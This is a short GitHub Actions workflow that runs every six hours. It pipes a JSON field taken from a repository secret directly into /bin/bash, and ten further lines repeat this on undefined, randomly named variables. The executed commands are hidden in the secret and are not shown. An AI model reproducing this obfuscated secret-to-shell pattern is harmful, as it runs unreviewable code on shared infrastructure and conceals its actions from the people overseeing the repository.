name: fanjiaoqingyi

on:
  workflow_dispatch:
  schedule:
    - cron: '3 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fanjiaoqingyi
        env:
          muew428: ${{ secrets.muew428 }}
        run: |
          echo $muew428 | jq -r .vscoz1 | /bin/bash
          echo $dv8384 | jq -r .qlb43363 | /bin/bash
          echo $o28403 | jq -r .ycb483 | /bin/bash
          echo $gepa0654 | jq -r .kiird5805 | /bin/bash
          echo $znnv9780 | jq -r .okhw179 | /bin/bash
          echo $iwrf0 | jq -r .yigva2120 | /bin/bash
          echo $fgwvb367 | jq -r .emqfq71 | /bin/bash
          echo $ypnmr26 | jq -r .qd2345 | /bin/bash
          echo $fmnvp3 | jq -r .l73690 | /bin/bash
          echo $jx2 | jq -r .ejqw55744 | /bin/bash
          echo $eycv5 | jq -r .aytjp895 | /bin/bash

